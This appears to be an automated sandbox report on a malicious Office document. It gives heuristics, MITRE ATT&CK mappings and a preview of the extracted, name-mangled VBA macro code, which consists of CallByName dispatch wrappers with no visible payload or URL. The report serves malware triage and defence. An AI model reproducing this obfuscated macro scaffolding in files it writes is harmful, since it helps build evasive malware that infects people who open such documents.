MALICIOUS
144
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document with detected VBA macros. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicates that the macro is designed to execute automatically upon opening the document, likely by using 'CreateObject' to launch a malicious payload. The presence of 'CallByName' calls further suggests dynamic execution of code.
Heuristics 6
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String) CallByName xoqaDLo, qwJny, 1 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1740 bytes |
SHA-256: bd71e932ea238920aed8a831826d949264f1ec272a2ea065705c49afbc02b7f3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
39 of 61 identifiers look randomly generated (e.g. 'FnNC3zJ5JxoN2U') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SiovGt" Private Sub ClDEAxxw(ByVal IMxuPR As Boolean, ByVal UBQIToI As Integer) QzYClH "FnNC3zJ5JxoN2U", 8941, "rCG482M5g" End Sub Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String) CallByName xoqaDLo, qwJny, 1 End Sub Public Sub uLMdQEzSM(ByVal EHhZvkvY As Variant, ByVal sZbhA As String, ByVal nQJGcyJuxH As Variant, ByVal loEiPnFEA As Object, ByVal quuPFeRPwX As Variant) IXNhTW = "l2VZR9nD2" CallByName loEiPnFEA, sZbhA, 1, EHhZvkvY, nQJGcyJuxH, quuPFeRPwX End Sub Public Function kHJDvJ(ByVal nYiINdSYPo As String, ByVal QimeyGm As Object, ByVal kKdMPKx As String) As Variant Dim VmKBS As Integer, bAmMXC As Integer Set kHJDvJ = CallByName(QimeyGm, nYiINdSYPo, 2, kKdMPKx) End Function Public Sub QavSmHwAdE(ByVal kXMXvgXM As Variant, ByVal UihLPcbp As String, ByVal LbRDnPIz As Integer, ByVal zwuHQkbdv As Variant, ByVal AvKZEdLCKg As String, ByVal ZdFxP As Object) CallByName ZdFxP, UihLPcbp, 1, kXMXvgXM, zwuHQkbdv End Sub Public Sub HQvScqTefi(ByVal OnIWlzab As Boolean, ByVal Jmipofj As Variant, ByVal bNiRsuvF As Object, ByVal jXGWtA As String) CallByName bNiRsuvF, jXGWtA, 4, Jmipofj End Sub Private Sub jIAMbLT(ByVal AEwBfCTeA As Integer, ByVal vOPGfq As Integer) VYZRTX "PMlVAnnZYb" FaPULoVT 5592, "iL2G7ATQq9s", "6nCQR9WtSsb" End Sub Public Sub lITquzHn(ByVal NIuVH As String, ByVal DGnrbz As Object, ByVal ltxCfvQYK As Integer, ByVal MWKWM As Variant, ByVal vvSEm As String) CallByName DGnrbz, vvSEm, 1, MWKWM End Sub Public Function JvWgrglen(ByVal xfQxkqo As String, ByVal afGcAxt As String, ByVal dJYFud As Object) As Variant Dim FzqRXM As Integer, UNYDxtaaT As Boolean JvWgrglen = CallByName(dJYFud, afGcAxt, 2) End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.